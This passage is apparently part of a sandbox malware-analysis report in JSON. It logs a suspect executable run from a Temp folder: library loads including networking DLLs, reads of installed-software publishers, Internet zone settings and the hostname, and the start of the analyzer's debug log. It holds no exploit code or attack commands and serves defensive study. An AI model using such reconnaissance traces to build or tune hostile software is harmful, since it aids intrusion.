"library", "timestamp": "2025-02-27 23:34:15,972", "eid": 72, "data": { "file": "ext-ms-win-rtcore-ntuser-window-ext-l1-1-0.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:15,972", "eid": 73, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:15,972", "eid": 74, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\IsVailContainer", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:15,972", "eid": 75, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Input\\ResyncResetTime", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:15,972", "eid": 76, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Input\\MaxResyncAttempts", "content": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:15,972", "eid": 77, "data": { "file": "iertutil.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:15,972", "eid": 78, "data": { "file": "USER32", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:15,972", "eid": 79, "data": { "file": "C:\\Windows\\System32\\msctf.dll", "pathtofile": null, "moduleaddress": "0x75650000" } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:15,987", "eid": 80, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:18,019", "eid": 81, "data": { "file": "Msi.dll", "pathtofile": null, "moduleaddress": "0x72b20000" } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:18,019", "eid": 82, "data": { "file": "KERNEL32.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:18,019", "eid": 83, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\2CD228B8B2E4A1742BC626947A22DD9B\\InstallProperties\\Publisher", "content": "Python Software Foundation" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:18,019", "eid": 84, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\354CFBD9D3C92FE4DA44706066629B35\\InstallProperties\\Publisher", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:18,019", "eid": 85, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\6F44AD6D2BD8E734883088D7D16A3610\\InstallProperties\\Publisher", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:18,019", "eid": 86, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\7A843FC81A86453429FD1FC7B2B3EF24\\InstallProperties\\Publisher", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:18,019", "eid": 87, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\C2852A6403C47FF4FA550FF1E6CF2D6B\\InstallProperties\\Publisher", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:18,019", "eid": 88, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\C49115752914EB648805A289B86E3BAB\\InstallProperties\\Publisher", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:18,019", "eid": 89, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\D070C70A7089E1B4DBA322FD6E5FCD74\\InstallProperties\\Publisher", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:18,019", "eid": 90, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\DEDD26948C27133438B0903EEA696564\\InstallProperties\\Publisher", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:18,034", "eid": 91, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\E9F59850C17A7A840A2E45D143500A35\\InstallProperties\\Publisher", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:18,034", "eid": 92, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\EAEFC47574231664CA1BD3EFB96C36EF\\InstallProperties\\Publisher", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:18,034", "eid": 93, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\2C6A1CF1E675A984B9A4292DF1451263\\InstallProperties\\Publisher", "content": "Microsoft Corporation" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:18,034", "eid": 94, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\671B50879509DB54C8A4B5E90B2C3C78\\InstallProperties\\Publisher", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:18,034", "eid": 95, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9\\InstallProperties\\Publisher", "content": "Microsoft Corporation" } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:18,066", "eid": 96, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": "0x77150000" } }, { "event": "execute", "object": "file", "timestamp": "2025-02-27 23:34:18,066", "eid": 97, "data": { "file": "\"C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe\" " } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:21,144", "eid": 98, "data": { "file": "Msi.dll", "pathtofile": null, "moduleaddress": "0x72f40000" } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:21,284", "eid": 99, "data": { "file": "KERNEL32.DLL", "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:21,519", "eid": 100, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\2CD228B8B2E4A1742BC626947A22DD9B\\InstallProperties\\Publisher", "content": "Python Software Foundation" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:21,519", "eid": 101, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\354CFBD9D3C92FE4DA44706066629B35\\InstallProperties\\Publisher", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:21,519", "eid": 102, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\6F44AD6D2BD8E734883088D7D16A3610\\InstallProperties\\Publisher", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:21,519", "eid": 103, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\7A843FC81A86453429FD1FC7B2B3EF24\\InstallProperties\\Publisher", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:21,519", "eid": 104, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\C2852A6403C47FF4FA550FF1E6CF2D6B\\InstallProperties\\Publisher", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:21,519", "eid": 105, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\C49115752914EB648805A289B86E3BAB\\InstallProperties\\Publisher", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:21,519", "eid": 106, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\D070C70A7089E1B4DBA322FD6E5FCD74\\InstallProperties\\Publisher", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:21,566", "eid": 107, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\DEDD26948C27133438B0903EEA696564\\InstallProperties\\Publisher", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:21,566", "eid": 108, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\E9F59850C17A7A840A2E45D143500A35\\InstallProperties\\Publisher", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:21,581", "eid": 109, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Products\\EAEFC47574231664CA1BD3EFB96C36EF\\InstallProperties\\Publisher", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:21,581", "eid": 110, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\2C6A1CF1E675A984B9A4292DF1451263\\InstallProperties\\Publisher", "content": "Microsoft Corporation" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:21,581", "eid": 111, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\671B50879509DB54C8A4B5E90B2C3C78\\InstallProperties\\Publisher", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:21,581", "eid": 112, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\910A08ADB3C4AAD4CA1A96737DACFAE9\\InstallProperties\\Publisher", "content": "Microsoft Corporation" } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:22,175", "eid": 113, "data": { "file": "wininet.dll", "pathtofile": null, "moduleaddress": "0x72ae0000" } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:22,362", "eid": 114, "data": { "file": "kernel32.dll", "pathtofile": null, "moduleaddress": "0x75860000" } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:22,487", "eid": 115, "data": { "file": "user32.dll", "pathtofile": null, "moduleaddress": "0x76610000" } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:22,519", "eid": 116, "data": { "file": "ondemandconnroutehelper.dll", "pathtofile": null, "moduleaddress": "0x73900000" } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:22,534", "eid": 117, "data": { "file": "winhttp.dll", "pathtofile": null, "moduleaddress": "0x73ca0000" } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:22,550", "eid": 118, "data": { "file": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll", "pathtofile": null, "moduleaddress": "0x73900000" } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:22,566", "eid": 119, "data": { "file": "C:\\Windows\\System32\\mswsock.dll", "pathtofile": null, "moduleaddress": "0x71a30000" } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:22,581", "eid": 120, "data": { "file": "winhttp.dll", "pathtofile": null, "moduleaddress": "0x73ca0000" } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:22,581", "eid": 121, "data": { "file": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll", "pathtofile": null, "moduleaddress": "0x73900000" } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:22,581", "eid": 122, "data": { "file": "winhttp.dll", "pathtofile": null, "moduleaddress": "0x73ca0000" } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:22,612", "eid": 123, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,612", "eid": 124, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Security_HKLM_only", "content": null } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:22,612", "eid": 125, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,612", "eid": 126, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Internet Explorer\\Security\\DisableSecuritySettingsCheck", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,612", "eid": 127, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Security\\DisableSecuritySettingsCheck", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,612", "eid": 128, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SystemSetupInProgress", "content": "0" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,612", "eid": 129, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\Flags", "content": "33" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,612", "eid": 130, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\Flags", "content": "219" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,612", "eid": 131, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\Flags", "content": "71" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,612", "eid": 132, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\Flags", "content": "1" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,612", "eid": 133, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\Flags", "content": "3" } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:22,612", "eid": 134, "data": { "file": "msiso.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,612", "eid": 135, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LOCALMACHINE_LOCKDOWN\\f1ffd3c13b7bd7f498e8.exe", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,612", "eid": 136, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main\\FeatureControl\\FEATURE_LOCALMACHINE_LOCKDOWN\\*", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,612", "eid": 137, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\Flags", "content": "33" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,612", "eid": 138, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\Flags", "content": "219" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,612", "eid": 139, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\Flags", "content": "71" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,612", "eid": 140, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\Flags", "content": "1" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,612", "eid": 141, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\Flags", "content": "3" } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:22,628", "eid": 142, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,628", "eid": 143, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\CreateUriCacheSize", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,628", "eid": 144, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\CreateUriCacheSize", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,628", "eid": 145, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\CreateUriCacheSize", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,628", "eid": 146, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\CreateUriCacheSize", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,628", "eid": 147, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnablePunycode", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,628", "eid": 148, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnablePunycode", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,628", "eid": 149, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnablePunycode", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,628", "eid": 150, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\EnablePunycode", "content": "1" } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:22,628", "eid": 151, "data": { "file": "ntdll.dll", "pathtofile": null, "moduleaddress": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,628", "eid": 152, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Internet Explorer\\Security\\DisableSecuritySettingsCheck", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,628", "eid": 153, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Security\\DisableSecuritySettingsCheck", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,628", "eid": 154, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname", "content": "DESKTOP-JQK72EN" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,628", "eid": 155, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname", "content": "DESKTOP-JQK72EN" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,628", "eid": 156, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect", "content": "0" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,628", "eid": 157, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName", "content": "1" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,628", "eid": 158, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass", "content": "1" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,628", "eid": 159, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1A10", "content": "1" } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:22,628", "eid": 160, "data": { "file": "C:\\Windows\\System32\\mswsock.dll", "pathtofile": null, "moduleaddress": "0x71a30000" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,628", "eid": 161, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\WinSock2\\Parameters\\WinSock_Registry_Version", "content": null } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,628", "eid": 162, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\WinSock2\\Parameters\\WinSock_Registry_Version", "content": "2.0" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,628", "eid": 163, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\WinSock2\\Parameters\\AutodialDLL", "content": "C:\\Windows\\System32\\rasadhlp.dll" } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:22,644", "eid": 164, "data": { "file": "C:\\Windows\\System32\\rasadhlp.dll", "pathtofile": null, "moduleaddress": "0x73940000" } }, { "event": "load", "object": "library", "timestamp": "2025-02-27 23:34:22,847", "eid": 165, "data": { "file": "C:\\Windows\\System32\\FWPUCLNT.DLL", "pathtofile": null, "moduleaddress": "0x73720000" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,847", "eid": 166, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES\\Latest", "content": "C:\\Program Files\\WindowsApps\\Microsoft.LanguageExperiencePackes-ES_19041.80.278.0_neutral__8wekyb3d8bbwe" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,847", "eid": 167, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES\\Latest", "content": "C:\\Program Files\\WindowsApps\\Microsoft.LanguageExperiencePackes-ES_19041.80.278.0_neutral__8wekyb3d8bbwe" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,847", "eid": 168, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES\\Latest", "content": "C:\\Program Files\\WindowsApps\\Microsoft.LanguageExperiencePackes-ES_19041.80.278.0_neutral__8wekyb3d8bbwe" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,862", "eid": 169, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES\\Latest", "content": "C:\\Program Files\\WindowsApps\\Microsoft.LanguageExperiencePackes-ES_19041.80.278.0_neutral__8wekyb3d8bbwe" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:22,862", "eid": 170, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES\\Latest", "content": "C:\\Program Files\\WindowsApps\\Microsoft.LanguageExperiencePackes-ES_19041.80.278.0_neutral__8wekyb3d8bbwe" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:27,909", "eid": 171, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname", "content": "DESKTOP-JQK72EN" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:27,909", "eid": 172, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname", "content": "DESKTOP-JQK72EN" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:27,909", "eid": 173, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect", "content": "0" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:27,909", "eid": 174, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName", "content": "1" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:34:27,909", "eid": 175, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass", "content": "1" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:35:38,612", "eid": 176, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname", "content": "DESKTOP-JQK72EN" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:35:38,612", "eid": 177, "data": { "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname", "content": "DESKTOP-JQK72EN" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:35:38,612", "eid": 178, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect", "content": "0" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:35:38,612", "eid": 179, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName", "content": "1" } }, { "event": "read", "object": "registry", "timestamp": "2025-02-27 23:35:38,612", "eid": 180, "data": { "regkey": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass", "content": "1" } } ], "encryptedbuffers": [] }, "debug": { "log": "2025-02-20 10:20:15,916 [root] INFO: Date set to: 20250227T23:33:59, timeout set to: 180\n2025-02-27 23:33:59,934 [root] DEBUG: Starting analyzer from: C:\\tmpocdzpyju\n2025-02-27 23:33:59,934 [root] DEBUG: Storing results at: C:\\KyIbqcSeMB\n2025-02-27 23:33:59,934 [root] DEBUG: Pipe server name: \\\\.\\PIPE\\QKCoeZo\n2025-02-27 23:33:59,934 [root] DEBUG: Python path: C:\\Users\\pacop\\AppData\\Local\\Programs\\Python\\Python310-32\n2025-02-27 23:33:59,934 [root] INFO: analysis running as an admin\n2025-02-27 23:33:59,934 [root] INFO: analysis package specified: \"exe\"\n2025-02-27 23:33:59,934 [root] DEBUG: importing analysis package module: \"modules.packages.exe\"...\n2025-02-27 23:33:59,950 [root] DEBUG: imported analysis package \"exe\"\n2025-02-27 